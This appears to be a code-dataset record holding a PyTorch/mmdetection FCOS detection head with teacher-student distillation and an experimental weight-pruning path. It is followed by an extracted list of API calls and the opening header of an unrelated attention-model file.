self.in_channels = in_channels
self.feat_channels = feat_channels
self.stacked_convs = stacked_convs
self.strides = strides
self.regress_ranges = regress_ranges
self.t_s_ratio = t_s_ratio
self.align_level = align_level
self.training = training
self.eval_student = eval_student
self.learn_when_train = learn_when_train
self.loss_cls = build_loss(loss_cls)
self.loss_bbox = build_loss(loss_bbox)
self.loss_centerness = build_loss(loss_centerness)
self.loss_s_t_cls = build_loss(loss_s_t_cls)
self.loss_s_t_reg=build_loss(loss_s_t_reg)
self.conv_cfg = conv_cfg
self.norm_cfg = norm_cfg
self.fp16_enabled = False
self._init_teacher_layers()
self._init_student_layers()
def _init_teacher_layers(self):
self.cls_convs = nn.ModuleList()
self.reg_convs = nn.ModuleList()
for i in range(self.stacked_convs):
chn = self.in_channels if i == 0 else self.feat_channels
self.cls_convs.append(
ConvModule(
chn,
self.feat_channels,
3,
stride=1,
padding=1,
conv_cfg=self.conv_cfg,
norm_cfg=self.norm_cfg,
bias=self.norm_cfg is None))
self.reg_convs.append(
ConvModule(
chn,
self.feat_channels,
3,
stride=1,
padding=1,
conv_cfg=self.conv_cfg,
norm_cfg=self.norm_cfg,
bias=self.norm_cfg is None))
self.fcos_cls = nn.Conv2d(
self.feat_channels, self.cls_out_channels, 3, padding=1)
self.fcos_reg = nn.Conv2d(self.feat_channels, 4, 3, padding=1)
self.fcos_centerness = nn.Conv2d(self.feat_channels, 1, 3, padding=1)
self.scales = nn.ModuleList([Scale(1.0) for _ in self.strides])
def _init_student_layers(self):
self.s_cls_convs = nn.ModuleList()
self.s_reg_convs = nn.ModuleList()
self.student_feat_channels = int(self.feat_channels / self.t_s_ratio)
for i in range(self.stacked_convs):
chn = self.in_channels if i == 0 else self.student_feat_channels
self.s_cls_convs.append(
ConvModule(
chn,
self.student_feat_channels,
3,
stride=1,
padding=1,
conv_cfg=self.conv_cfg,
norm_cfg=self.norm_cfg,
bias=self.norm_cfg is None))
self.s_reg_convs.append(
ConvModule(
chn,
self.student_feat_channels,
3,
stride=1,
padding=1,
conv_cfg=self.conv_cfg,
norm_cfg=self.norm_cfg,
bias=self.norm_cfg is None))
# Align student feature to teacher
self.t_s_cls_align = nn.Conv2d(
self.student_feat_channels, self.feat_channels, 3, padding=1)
self.t_s_reg_align = nn.Conv2d(
self.student_feat_channels, self.feat_channels, 3, padding=1)
self.fcos_s_cls = nn.Conv2d(
self.student_feat_channels, self.cls_out_channels, 3, padding=1)
self.fcos_s_reg = nn.Conv2d(self.student_feat_channels, 4, 3, padding=1)
self.fcos_s_centerness = nn.Conv2d(self.student_feat_channels, 1, 3, padding=1)
self.scales = nn.ModuleList([Scale(1.0) for _ in self.strides])
def init_weights(self):
for m in self.cls_convs:
normal_init(m.conv, std=0.01)
for m in self.reg_convs:
normal_init(m.conv, std=0.01)
bias_cls = bias_init_with_prob(0.01)
normal_init(self.fcos_cls, std=0.01, bias=bias_cls)
normal_init(self.fcos_reg, std=0.01)
normal_init(self.fcos_centerness, std=0.01)
# student model
for m in self.s_cls_convs:
normal_init(m.conv, std=0.01)
for m in self.s_reg_convs:
normal_init(m.conv, std=0.01)
bias_s_cls = bias_init_with_prob(0.01)
normal_init(self.t_s_cls_align, std=0.01)
normal_init(self.t_s_reg_align, std=0.01)
normal_init(self.fcos_s_cls, std=0.01, bias=bias_s_cls)
normal_init(self.fcos_s_reg, std=0.01)
normal_init(self.fcos_s_centerness, std=0.01)
def forward(self, feats):
return multi_apply(self.forward_single, feats, self.scales)
def forward_single(self, x, scale):
cls_feat = x
reg_feat = x
        # detach the input so gradients from the student head do not update the shared backbone
s_cls_feat = x.detach()
s_reg_feat = x.detach()
for i in range(len(self.cls_convs)):
cls_layer = self.cls_convs[i]
cls_s_layer = self.s_cls_convs[i]
cls_feat = cls_layer(cls_feat)
s_cls_feat = cls_s_layer(s_cls_feat)
if i == self.align_level:
s_align_cls_feat = s_cls_feat
t_aligned_cls_feat = cls_feat
cls_score = self.fcos_cls(cls_feat)
s_cls_score = self.fcos_s_cls(s_cls_feat)
centerness = self.fcos_centerness(cls_feat)
s_centerness = self.fcos_s_centerness(s_cls_feat)
        prune = True
        # testing: how about pruning the teacher features and weights directly?
if not prune:
for j in range(len(self.reg_convs)):
reg_layer = self.reg_convs[j]
s_reg_layer = self.s_reg_convs[j]
reg_feat = reg_layer(reg_feat)
s_reg_feat = s_reg_layer(s_reg_feat)
if j == self.align_level:
s_align_reg_feat = s_reg_feat
t_aligned_reg_feat = reg_feat
else:
for j in range(len(self.reg_convs)):
reg_layer = self.reg_convs[j]
s_reg_layer = self.s_reg_convs[j]
# prune teacher
origin_weight = reg_layer.conv.weight
# zero_tensor = torch.zeros_like(origin_weight)
# weight_mean = reg_layer.conv.weight.mean(0).expand(256, 256, 3, 3)
# reg_layer.conv.weight.data = torch.where(reg_layer.conv.weight.data > weight_mean, reg_layer.conv.weight.data, zero_tensor)
weight_mask = torch.zeros_like(origin_weight)
weight_mask[:192, ...] = 1
reg_layer.conv.weight.data = origin_weight * weight_mask
reg_feat[:, 192:, ...] = 0
reg_feat = reg_layer(reg_feat)
s_reg_feat = s_reg_layer(s_reg_feat)
if j == self.align_level:
s_align_reg_feat = s_reg_feat
t_aligned_reg_feat = reg_feat
# scale the bbox_pred of different level
# float to avoid overflow when enabling FP16
bbox_pred = scale(self.fcos_reg(reg_feat)).float().exp()
s_bbox_pred = scale(self.fcos_s_reg(s_reg_feat)).float().exp()
# feature align to teacher
s_align_reg_feat = self.t_s_reg_align(s_align_reg_feat)
s_align_cls_feat = self.t_s_cls_align(s_align_cls_feat)
if self.training:
return cls_score, bbox_pred, centerness, s_cls_score, s_bbox_pred, s_centerness, t_aligned_cls_feat, s_align_cls_feat, t_aligned_reg_feat, s_align_reg_feat
else:
if self.eval_student:
return s_cls_score, s_bbox_pred, s_centerness
else:
return cls_score, bbox_pred, centerness
@force_fp32(apply_to=('cls_scores', 'bbox_preds', 'centernesses'))
def loss(self, cls_scores, bbox_preds, centernesses,
s_cls_scores, s_bbox_preds, s_centernesses,
cls_feats, s_cls_feats, reg_feats, s_reg_feats,
gt_bboxes, gt_labels, img_metas, cfg,
gt_bboxes_ignore=None):
loss_cls, loss_bbox, loss_centerness = self.loss_single(cls_scores,
bbox_preds,
centernesses,
gt_bboxes,
gt_labels,
img_metas,
cfg,
gt_bboxes_ignore=None)
s_loss_cls, s_loss_bbox, s_loss_centerness = self.loss_single(s_cls_scores,
s_bbox_preds,
s_centernesses,
gt_bboxes,
gt_labels,
img_metas,
cfg,
gt_bboxes_ignore=None)
flatten_s_cls_feat = [
s_cls_feat.permute(0, 2, 3, 1).reshape(-1, self.student_feat_channels)
for s_cls_feat in s_cls_feats
]
flatten_cls_feat = [
cls_feat.permute(0, 2, 3, 1).reshape(-1, self.student_feat_channels)
for cls_feat in cls_feats
]
flatten_s_reg_feat = [
s_reg_feat.permute(0, 2, 3, 1).reshape(-1, self.student_feat_channels)
for s_reg_feat in s_reg_feats
]
flatten_reg_feat = [
reg_feat.permute(0, 2, 3, 1).reshape(-1, self.student_feat_channels)
for reg_feat in reg_feats
]
flatten_s_cls_feat = torch.cat(flatten_s_cls_feat)
flatten_cls_feat = torch.cat(flatten_cls_feat)
flatten_s_reg_feat = torch.cat(flatten_s_reg_feat)
flatten_reg_feat = torch.cat(flatten_reg_feat)
if self.learn_when_train:
if str(self.loss_s_t_cls) == 'MSELoss()':
loss_s_t_cls = self.loss_s_t_cls(flatten_s_cls_feat, flatten_cls_feat.detach())
loss_s_t_reg = self.loss_s_t_reg(flatten_s_reg_feat, flatten_reg_feat.detach())
elif str(self.loss_s_t_cls) == 'CrossEntropyLoss()':
loss_s_t_cls = self.loss_s_t_cls(flatten_s_cls_feat, flatten_cls_feat.detach().sigmoid())
loss_s_t_reg = self.loss_s_t_reg(flatten_s_reg_feat, flatten_reg_feat.detach().sigmoid())
return dict(
loss_cls=loss_cls,
s_loss_cls=s_loss_cls,
loss_bbox=loss_bbox,
s_loss_bbox=s_loss_bbox,
loss_centerness=loss_centerness,
s_loss_centerness=s_loss_centerness,
loss_s_t_cls=loss_s_t_cls,
loss_s_t_reg=loss_s_t_reg)
else:
return dict(
loss_cls=loss_cls,
s_loss_cls=s_loss_cls,
loss_bbox=loss_bbox,
s_loss_bbox=s_loss_bbox,
loss_centerness=loss_centerness,
s_loss_centerness=s_loss_centerness)
@force_fp32(apply_to=('cls_scores', 'bbox_preds', 'centernesses'))
def loss_single(self,
cls_scores,
bbox_preds,
centernesses,
gt_bboxes,
gt_labels,
img_metas,
cfg,
gt_bboxes_ignore=None):
assert len(cls_scores) == len(bbox_preds) == len(centernesses)
featmap_sizes = [featmap.size()[-2:] for featmap in cls_scores]
all_level_points = self.get_points(featmap_sizes, bbox_preds[0].dtype,
bbox_preds[0].device)
labels, bbox_targets = self.fcos_target(all_level_points, gt_bboxes,
gt_labels)
num_imgs = cls_scores[0].size(0)
# flatten cls_scores, bbox_preds and centerness
flatten_cls_scores = [
cls_score.permute(0, 2, 3, 1).reshape(-1, self.cls_out_channels)
for cls_score in cls_scores
]
flatten_bbox_preds = [
bbox_pred.permute(0, 2, 3, 1).reshape(-1, 4)
for bbox_pred in bbox_preds
]
flatten_centerness = [
centerness.permute(0, 2, 3, 1).reshape(-1)
for centerness in centernesses
]
flatten_cls_scores = torch.cat(flatten_cls_scores)
flatten_bbox_preds = torch.cat(flatten_bbox_preds)
flatten_centerness = torch.cat(flatten_centerness)
flatten_labels = torch.cat(labels)
flatten_bbox_targets = torch.cat(bbox_targets)
# repeat points to align with bbox_preds
flatten_points = torch.cat(
[points.repeat(num_imgs, 1) for points in all_level_points])
pos_inds = flatten_labels.nonzero().reshape(-1)
num_pos = len(pos_inds)
loss_cls = self.loss_cls(
flatten_cls_scores, flatten_labels,
avg_factor=num_pos + num_imgs) # avoid num_pos is 0
pos_bbox_preds = flatten_bbox_preds[pos_inds]
pos_centerness = flatten_centerness[pos_inds]
if num_pos > 0:
pos_bbox_targets = flatten_bbox_targets[pos_inds]
pos_centerness_targets = self.centerness_target(pos_bbox_targets)
pos_points = flatten_points[pos_inds]
pos_decoded_bbox_preds = distance2bbox(pos_points, pos_bbox_preds)
pos_decoded_target_preds = distance2bbox(pos_points,
pos_bbox_targets)
# centerness weighted iou loss
loss_bbox = self.loss_bbox(
pos_decoded_bbox_preds,
pos_decoded_target_preds,
weight=pos_centerness_targets,
avg_factor=pos_centerness_targets.sum())
loss_centerness = self.loss_centerness(pos_centerness,
pos_centerness_targets)
else:
loss_bbox = pos_bbox_preds.sum()
loss_centerness = pos_centerness.sum()
return loss_cls, loss_bbox, loss_centerness
@force_fp32(apply_to=('cls_scores', 'bbox_preds', 'centernesses'))
def get_bboxes(self,
cls_scores,
bbox_preds,
centernesses,
img_metas,
cfg,
rescale=None):
assert len(cls_scores) == len(bbox_preds)
num_levels = len(cls_scores)
featmap_sizes = [featmap.size()[-2:] for featmap in cls_scores]
mlvl_points = self.get_points(featmap_sizes, bbox_preds[0].dtype,
bbox_preds[0].device)
result_list = []
for img_id in range(len(img_metas)):
cls_score_list = [
cls_scores[i][img_id].detach() for i in range(num_levels)
]
bbox_pred_list = [
bbox_preds[i][img_id].detach() for i in range(num_levels)
]
centerness_pred_list = [
centernesses[i][img_id].detach() for i in range(num_levels)
]
img_shape = img_metas[img_id]['img_shape']
scale_factor = img_metas[img_id]['scale_factor']
det_bboxes = self.get_bboxes_single(cls_score_list, bbox_pred_list,
centerness_pred_list,
mlvl_points, img_shape,
scale_factor, cfg, rescale)
result_list.append(det_bboxes)
return result_list
def get_bboxes_single(self,
cls_scores,
bbox_preds,
centernesses,
mlvl_points,
img_shape,
scale_factor,
cfg,
rescale=False):
assert len(cls_scores) == len(bbox_preds) == len(mlvl_points)
mlvl_bboxes = []
mlvl_scores = []
mlvl_centerness = []
for cls_score, bbox_pred, centerness, points in zip(
cls_scores, bbox_preds, centernesses, mlvl_points):
assert cls_score.size()[-2:] == bbox_pred.size()[-2:]
scores = cls_score.permute(1, 2, 0).reshape(
-1, self.cls_out_channels).sigmoid()
centerness = centerness.permute(1, 2, 0).reshape(-1).sigmoid()
bbox_pred = bbox_pred.permute(1, 2, 0).reshape(-1, 4)
nms_pre = cfg.get('nms_pre', -1)
if nms_pre > 0 and scores.shape[0] > nms_pre:
max_scores, _ = (scores * centerness[:, None]).max(dim=1)
_, topk_inds = max_scores.topk(nms_pre)
points = points[topk_inds, :]
bbox_pred = bbox_pred[topk_inds, :]
scores = scores[topk_inds, :]
centerness = centerness[topk_inds]
bboxes = distance2bbox(points, bbox_pred, max_shape=img_shape)
mlvl_bboxes.append(bboxes)
mlvl_scores.append(scores)
mlvl_centerness.append(centerness)
mlvl_bboxes = torch.cat(mlvl_bboxes)
if rescale:
mlvl_bboxes /= mlvl_bboxes.new_tensor(scale_factor)
mlvl_scores = torch.cat(mlvl_scores)
padding = mlvl_scores.new_zeros(mlvl_scores.shape[0], 1)
mlvl_scores = torch.cat([padding, mlvl_scores], dim=1)
mlvl_centerness = torch.cat(mlvl_centerness)
det_bboxes, det_labels = multiclass_nms(
mlvl_bboxes,
mlvl_scores,
cfg.score_thr,
cfg.nms,
cfg.max_per_img,
score_factors=mlvl_centerness)
return det_bboxes, det_labels
def get_points(self, featmap_sizes, dtype, device):
"""Get points according to feature map sizes.
Args:
featmap_sizes (list[tuple]): Multi-level feature map sizes.
dtype (torch.dtype): Type of points.
device (torch.device): Device of points.
Returns:
            list[Tensor]: points of each feature map level.
"""
mlvl_points = []
for i in range(len(featmap_sizes)):
mlvl_points.append(
self.get_points_single(featmap_sizes[i], self.strides[i],
dtype, device))
return mlvl_points
def get_points_single(self, featmap_size, stride, dtype, device):
h, w = featmap_size
x_range = torch.arange(
0, w * stride, stride, dtype=dtype, device=device)
y_range = torch.arange(
0, h * stride, stride, dtype=dtype, device=device)
y, x = torch.meshgrid(y_range, x_range)
points = torch.stack(
(x.reshape(-1), y.reshape(-1)), dim=-1) + stride // 2
return points
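    # Editor's note (illustration, not in the original source): for a 2x3
    # feature map with stride 8, get_points_single yields the grid
    # (4, 4), (12, 4), (20, 4), (4, 12), (12, 12), (20, 12),
    # i.e. x varies fastest and each point sits stride // 2 inside its cell.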
def fcos_target(self, points, gt_bboxes_list, gt_labels_list):
assert len(points) == len(self.regress_ranges)
num_levels = len(points)
# expand regress ranges to align with points
expanded_regress_ranges = [
points[i].new_tensor(self.regress_ranges[i])[None].expand_as(
points[i]) for i in range(num_levels)
]
# concat all levels points and regress ranges
concat_regress_ranges = torch.cat(expanded_regress_ranges, dim=0)
concat_points = torch.cat(points, dim=0)
# get labels and bbox_targets of each image
labels_list, bbox_targets_list = multi_apply(
self.fcos_target_single,
gt_bboxes_list,
gt_labels_list,
points=concat_points,
regress_ranges=concat_regress_ranges)
# split to per img, per level
num_points = [center.size(0) for center in points]
labels_list = [labels.split(num_points, 0) for labels in labels_list]
bbox_targets_list = [
bbox_targets.split(num_points, 0)
for bbox_targets in bbox_targets_list
]
        # concat the per-level targets across images
concat_lvl_labels = []
concat_lvl_bbox_targets = []
for i in range(num_levels):
concat_lvl_labels.append(
torch.cat([labels[i] for labels in labels_list]))
concat_lvl_bbox_targets.append(
torch.cat(
[bbox_targets[i] for bbox_targets in bbox_targets_list]))
return concat_lvl_labels, concat_lvl_bbox_targets
def fcos_target_single(self, gt_bboxes, gt_labels, points, regress_ranges):
num_points = points.size(0)
num_gts = gt_labels.size(0)
if num_gts == 0:
return gt_labels.new_zeros(num_points), \
gt_bboxes.new_zeros((num_points, 4))
areas = (gt_bboxes[:, 2] - gt_bboxes[:, 0] + 1) * (
gt_bboxes[:, 3] - gt_bboxes[:, 1] + 1)
# TODO: figure out why these two are different
# areas = areas[None].expand(num_points, num_gts)
areas = areas[None].repeat(num_points, 1)
regress_ranges = regress_ranges[:, None, :].expand(
num_points, num_gts, 2)
gt_bboxes = gt_bboxes[None].expand(num_points, num_gts, 4)
xs, ys = points[:, 0], points[:, 1]
xs = xs[:, None].expand(num_points, num_gts)
ys = ys[:, None].expand(num_points, num_gts)
left = xs - gt_bboxes[..., 0]
right = gt_bboxes[..., 2] - xs
top = ys - gt_bboxes[..., 1]
bottom = gt_bboxes[..., 3] - ys
bbox_targets = torch.stack((left, top, right, bottom), -1)
# condition1: inside a gt bbox
inside_gt_bbox_mask = bbox_targets.min(-1)[0] > 0
# condition2: limit the regression range for each location
max_regress_distance = bbox_targets.max(-1)[0]
inside_regress_range = (
max_regress_distance >= regress_ranges[..., 0]) & (
max_regress_distance <= regress_ranges[..., 1])
# if there are still more than one objects for a location,
# we choose the one with minimal area
areas[inside_gt_bbox_mask == 0] = INF
areas[inside_regress_range == 0] = INF
min_area, min_area_inds = areas.min(dim=1)
labels = gt_labels[min_area_inds]
labels[min_area == INF] = 0
bbox_targets = bbox_targets[range(num_points), min_area_inds]
return labels, bbox_targets
def centerness_target(self, pos_bbox_targets):
# only calculate pos centerness targets, otherwise there may be nan
left_right = pos_bbox_targets[:, [0, 2]]
top_bottom = pos_bbox_targets[:, [1, 3]]
centerness_targets = (
left_right.min(dim=-1)[0] / left_right.max(dim=-1)[0]) * (
top_bottom.min(dim=-1)[0] / top_bottom.max(dim=-1)[0])
return torch.sqrt(centerness_targets)
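    # Editor's note (worked example, not in the original source): for offsets
    # (left, top, right, bottom) = (2, 4, 8, 4) the target above evaluates to
    # sqrt(min(2, 8) / max(2, 8) * min(4, 4) / max(4, 4)) = sqrt(0.25) = 0.5,
    # so targets approach 1 only at the exact centre of the ground-truth box.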
|
[
"torch.stack",
"torch.zeros_like",
"torch.nn.ModuleList",
"torch.sqrt",
"torch.nn.Conv2d",
"mmdet.core.force_fp32",
"torch.cat",
"torch.meshgrid",
"mmdet.core.distance2bbox",
"mmcv.cnn.normal_init",
"torch.arange",
"mmdet.core.multiclass_nms",
"mmdet.core.multi_apply"
] |
[((10174, 10239), 'mmdet.core.force_fp32', 'force_fp32', ([], {'apply_to': "('cls_scores', 'bbox_preds', 'centernesses')"}), "(apply_to=('cls_scores', 'bbox_preds', 'centernesses'))\n", (10184, 10239), False, 'from mmdet.core import distance2bbox, force_fp32, multi_apply, multiclass_nms\n'), ((13126, 13191), 'mmdet.core.force_fp32', 'force_fp32', ([], {'apply_to': "('cls_scores', 'bbox_preds', 'centernesses')"}), "(apply_to=('cls_scores', 'bbox_preds', 'centernesses'))\n", (13136, 13191), False, 'from mmdet.core import distance2bbox, force_fp32, multi_apply, multiclass_nms\n'), ((16167, 16232), 'mmdet.core.force_fp32', 'force_fp32', ([], {'apply_to': "('cls_scores', 'bbox_preds', 'centernesses')"}), "(apply_to=('cls_scores', 'bbox_preds', 'centernesses'))\n", (16177, 16232), False, 'from mmdet.core import distance2bbox, force_fp32, multi_apply, multiclass_nms\n'), ((3225, 3240), 'torch.nn.ModuleList', 'nn.ModuleList', ([], {}), '()\n', (3238, 3240), True, 'import torch.nn as nn\n'), ((3266, 3281), 'torch.nn.ModuleList', 'nn.ModuleList', ([], {}), '()\n', (3279, 3281), True, 'import torch.nn as nn\n'), ((4117, 4183), 'torch.nn.Conv2d', 'nn.Conv2d', (['self.feat_channels', 'self.cls_out_channels', '(3)'], {'padding': '(1)'}), '(self.feat_channels, self.cls_out_channels, 3, padding=1)\n', (4126, 4183), True, 'import torch.nn as nn\n'), ((4221, 4267), 'torch.nn.Conv2d', 'nn.Conv2d', (['self.feat_channels', '(4)', '(3)'], {'padding': '(1)'}), '(self.feat_channels, 4, 3, padding=1)\n', (4230, 4267), True, 'import torch.nn as nn\n'), ((4299, 4345), 'torch.nn.Conv2d', 'nn.Conv2d', (['self.feat_channels', '(1)', '(3)'], {'padding': '(1)'}), '(self.feat_channels, 1, 3, padding=1)\n', (4308, 4345), True, 'import torch.nn as nn\n'), ((4487, 4502), 'torch.nn.ModuleList', 'nn.ModuleList', ([], {}), '()\n', (4500, 4502), True, 'import torch.nn as nn\n'), ((4530, 4545), 'torch.nn.ModuleList', 'nn.ModuleList', ([], {}), '()\n', (4543, 4545), True, 'import torch.nn as nn\n'), ((5536, 5607), 'torch.nn.Conv2d', 'nn.Conv2d', (['self.student_feat_channels', 'self.feat_channels', '(3)'], {'padding': '(1)'}), '(self.student_feat_channels, self.feat_channels, 3, padding=1)\n', (5545, 5607), True, 'import torch.nn as nn\n'), ((5650, 5721), 'torch.nn.Conv2d', 'nn.Conv2d', (['self.student_feat_channels', 'self.feat_channels', '(3)'], {'padding': '(1)'}), '(self.student_feat_channels, self.feat_channels, 3, padding=1)\n', (5659, 5721), True, 'import torch.nn as nn\n'), ((5770, 5844), 'torch.nn.Conv2d', 'nn.Conv2d', (['self.student_feat_channels', 'self.cls_out_channels', '(3)'], {'padding': '(1)'}), '(self.student_feat_channels, self.cls_out_channels, 3, padding=1)\n', (5779, 5844), True, 'import torch.nn as nn\n'), ((5884, 5938), 'torch.nn.Conv2d', 'nn.Conv2d', (['self.student_feat_channels', '(4)', '(3)'], {'padding': '(1)'}), '(self.student_feat_channels, 4, 3, padding=1)\n', (5893, 5938), True, 'import torch.nn as nn\n'), ((5972, 6026), 'torch.nn.Conv2d', 'nn.Conv2d', (['self.student_feat_channels', '(1)', '(3)'], {'padding': '(1)'}), '(self.student_feat_channels, 1, 3, padding=1)\n', (5981, 6026), True, 'import torch.nn as nn\n'), ((6332, 6383), 'mmcv.cnn.normal_init', 'normal_init', (['self.fcos_cls'], {'std': '(0.01)', 'bias': 'bias_cls'}), '(self.fcos_cls, std=0.01, bias=bias_cls)\n', (6343, 6383), False, 'from mmcv.cnn import normal_init\n'), ((6392, 6428), 'mmcv.cnn.normal_init', 'normal_init', (['self.fcos_reg'], {'std': '(0.01)'}), '(self.fcos_reg, std=0.01)\n', (6403, 6428), False, 'from mmcv.cnn import normal_init\n'), ((6437, 6480), 'mmcv.cnn.normal_init', 'normal_init', (['self.fcos_centerness'], {'std': '(0.01)'}), '(self.fcos_centerness, std=0.01)\n', (6448, 6480), False, 'from mmcv.cnn import normal_init\n'), ((6714, 6755), 'mmcv.cnn.normal_init', 'normal_init', (['self.t_s_cls_align'], {'std': '(0.01)'}), '(self.t_s_cls_align, std=0.01)\n', (6725, 6755), False, 'from mmcv.cnn import normal_init\n'), ((6764, 6805), 'mmcv.cnn.normal_init', 'normal_init', (['self.t_s_reg_align'], {'std': '(0.01)'}), '(self.t_s_reg_align, std=0.01)\n', (6775, 6805), False, 'from mmcv.cnn import normal_init\n'), ((6814, 6869), 'mmcv.cnn.normal_init', 'normal_init', (['self.fcos_s_cls'], {'std': '(0.01)', 'bias': 'bias_s_cls'}), '(self.fcos_s_cls, std=0.01, bias=bias_s_cls)\n', (6825, 6869), False, 'from mmcv.cnn import normal_init\n'), ((6878, 6916), 'mmcv.cnn.normal_init', 'normal_init', (['self.fcos_s_reg'], {'std': '(0.01)'}), '(self.fcos_s_reg, std=0.01)\n', (6889, 6916), False, 'from mmcv.cnn import normal_init\n'), ((6925, 6970), 'mmcv.cnn.normal_init', 'normal_init', (['self.fcos_s_centerness'], {'std': '(0.01)'}), '(self.fcos_s_centerness, std=0.01)\n', (6936, 6970), False, 'from mmcv.cnn import normal_init\n'), ((7017, 7069), 'mmdet.core.multi_apply', 'multi_apply', (['self.forward_single', 'feats', 'self.scales'], {}), '(self.forward_single, feats, self.scales)\n', (7028, 7069), False, 'from mmdet.core import distance2bbox, force_fp32, multi_apply, multiclass_nms\n'), ((11697, 11726), 'torch.cat', 'torch.cat', (['flatten_s_cls_feat'], {}), '(flatten_s_cls_feat)\n', (11706, 11726), False, 'import torch\n'), ((11754, 11781), 'torch.cat', 'torch.cat', (['flatten_cls_feat'], {}), '(flatten_cls_feat)\n', (11763, 11781), False, 'import torch\n'), ((11811, 11840), 'torch.cat', 'torch.cat', (['flatten_s_reg_feat'], {}), '(flatten_s_reg_feat)\n', (11820, 11840), False, 'import torch\n'), ((11868, 11895), 'torch.cat', 'torch.cat', (['flatten_reg_feat'], {}), '(flatten_reg_feat)\n', (11877, 11895), False, 'import torch\n'), ((14407, 14436), 'torch.cat', 'torch.cat', (['flatten_cls_scores'], {}), '(flatten_cls_scores)\n', (14416, 14436), False, 'import torch\n'), ((14466, 14495), 'torch.cat', 'torch.cat', (['flatten_bbox_preds'], {}), '(flatten_bbox_preds)\n', (14475, 14495), False, 'import torch\n'), ((14525, 14554), 'torch.cat', 'torch.cat', (['flatten_centerness'], {}), '(flatten_centerness)\n', (14534, 14554), False, 'import torch\n'), ((14580, 14597), 'torch.cat', 'torch.cat', (['labels'], {}), '(labels)\n', (14589, 14597), False, 'import torch\n'), ((14629, 14652), 'torch.cat', 'torch.cat', (['bbox_targets'], {}), '(bbox_targets)\n', (14638, 14652), False, 'import torch\n'), ((19238, 19260), 'torch.cat', 'torch.cat', (['mlvl_bboxes'], {}), '(mlvl_bboxes)\n', (19247, 19260), False, 'import torch\n'), ((19367, 19389), 'torch.cat', 'torch.cat', (['mlvl_scores'], {}), '(mlvl_scores)\n', (19376, 19389), False, 'import torch\n'), ((19477, 19517), 'torch.cat', 'torch.cat', (['[padding, mlvl_scores]'], {'dim': '(1)'}), '([padding, mlvl_scores], dim=1)\n', (19486, 19517), False, 'import torch\n'), ((19544, 19570), 'torch.cat', 'torch.cat', (['mlvl_centerness'], {}), '(mlvl_centerness)\n', (19553, 19570), False, 'import torch\n'), ((19604, 19721), 'mmdet.core.multiclass_nms', 'multiclass_nms', (['mlvl_bboxes', 'mlvl_scores', 'cfg.score_thr', 'cfg.nms', 'cfg.max_per_img'], {'score_factors': 'mlvl_centerness'}), '(mlvl_bboxes, mlvl_scores, cfg.score_thr, cfg.nms, cfg.\n max_per_img, score_factors=mlvl_centerness)\n', (19618, 19721), False, 'from mmdet.core import distance2bbox, force_fp32, multi_apply, multiclass_nms\n'), ((20573, 20636), 'torch.arange', 'torch.arange', (['(0)', '(w * stride)', 'stride'], {'dtype': 'dtype', 'device': 'device'}), '(0, w * stride, stride, dtype=dtype, device=device)\n', (20585, 20636), False, 'import torch\n'), ((20668, 20731), 'torch.arange', 'torch.arange', (['(0)', '(h * stride)', 'stride'], {'dtype': 'dtype', 'device': 'device'}), '(0, h * stride, stride, dtype=dtype, device=device)\n', (20680, 20731), False, 'import torch\n'), ((20760, 20792), 'torch.meshgrid', 'torch.meshgrid', (['y_range', 'x_range'], {}), '(y_range, x_range)\n', (20774, 20792), False, 'import torch\n'), ((21380, 21421), 'torch.cat', 'torch.cat', (['expanded_regress_ranges'], {'dim': '(0)'}), '(expanded_regress_ranges, dim=0)\n', (21389, 21421), False, 'import torch\n'), ((21446, 21470), 'torch.cat', 'torch.cat', (['points'], {'dim': '(0)'}), '(points, dim=0)\n', (21455, 21470), False, 'import torch\n'), ((21564, 21697), 'mmdet.core.multi_apply', 'multi_apply', (['self.fcos_target_single', 'gt_bboxes_list', 'gt_labels_list'], {'points': 'concat_points', 'regress_ranges': 'concat_regress_ranges'}), '(self.fcos_target_single, gt_bboxes_list, gt_labels_list, points\n =concat_points, regress_ranges=concat_regress_ranges)\n', (21575, 21697), False, 'from mmdet.core import distance2bbox, force_fp32, multi_apply, multiclass_nms\n'), ((23569, 23612), 'torch.stack', 'torch.stack', (['(left, top, right, bottom)', '(-1)'], {}), '((left, top, right, bottom), -1)\n', (23580, 23612), False, 'import torch\n'), ((24852, 24882), 'torch.sqrt', 'torch.sqrt', (['centerness_targets'], {}), '(centerness_targets)\n', (24862, 24882), False, 'import torch\n'), ((6174, 6203), 'mmcv.cnn.normal_init', 'normal_init', (['m.conv'], {'std': '(0.01)'}), '(m.conv, std=0.01)\n', (6185, 6203), False, 'from mmcv.cnn import normal_init\n'), ((6249, 6278), 'mmcv.cnn.normal_init', 'normal_init', (['m.conv'], {'std': '(0.01)'}), '(m.conv, std=0.01)\n', (6260, 6278), False, 'from mmcv.cnn import normal_init\n'), ((6552, 6581), 'mmcv.cnn.normal_init', 'normal_init', (['m.conv'], {'std': '(0.01)'}), '(m.conv, std=0.01)\n', (6563, 6581), False, 'from mmcv.cnn import normal_init\n'), ((6629, 6658), 'mmcv.cnn.normal_init', 'normal_init', (['m.conv'], {'std': '(0.01)'}), '(m.conv, std=0.01)\n', (6640, 6658), False, 'from mmcv.cnn import normal_init\n'), ((15408, 15449), 'mmdet.core.distance2bbox', 'distance2bbox', (['pos_points', 'pos_bbox_preds'], {}), '(pos_points, pos_bbox_preds)\n', (15421, 15449), False, 'from mmdet.core import distance2bbox, force_fp32, multi_apply, multiclass_nms\n'), ((15489, 15532), 'mmdet.core.distance2bbox', 'distance2bbox', (['pos_points', 'pos_bbox_targets'], {}), '(pos_points, pos_bbox_targets)\n', (15502, 15532), False, 'from mmdet.core import distance2bbox, force_fp32, multi_apply, multiclass_nms\n'), ((19037, 19090), 'mmdet.core.distance2bbox', 'distance2bbox', (['points', 'bbox_pred'], {'max_shape': 'img_shape'}), '(points, bbox_pred, max_shape=img_shape)\n', (19050, 19090), False, 'from mmdet.core import distance2bbox, force_fp32, multi_apply, multiclass_nms\n'), ((8942, 8973), 'torch.zeros_like', 'torch.zeros_like', (['origin_weight'], {}), '(origin_weight)\n', (8958, 8973), False, 'import torch\n'), ((22258, 22306), 'torch.cat', 'torch.cat', (['[labels[i] for labels in labels_list]'], {}), '([labels[i] for labels in labels_list])\n', (22267, 22306), False, 'import torch\n'), ((22368, 22434), 'torch.cat', 'torch.cat', (['[bbox_targets[i] for bbox_targets in bbox_targets_list]'], {}), '([bbox_targets[i] for bbox_targets in bbox_targets_list])\n', (22377, 22434), False, 'import torch\n')]
|
# ==============================================================================
# Copyright (c) Microsoft. All rights reserved.
# Licensed under the MIT license. See LICENSE.md file in the project root
# for full license information.
# ==============================================================================
'''
Standard attention model.
'''
from __future__ import division
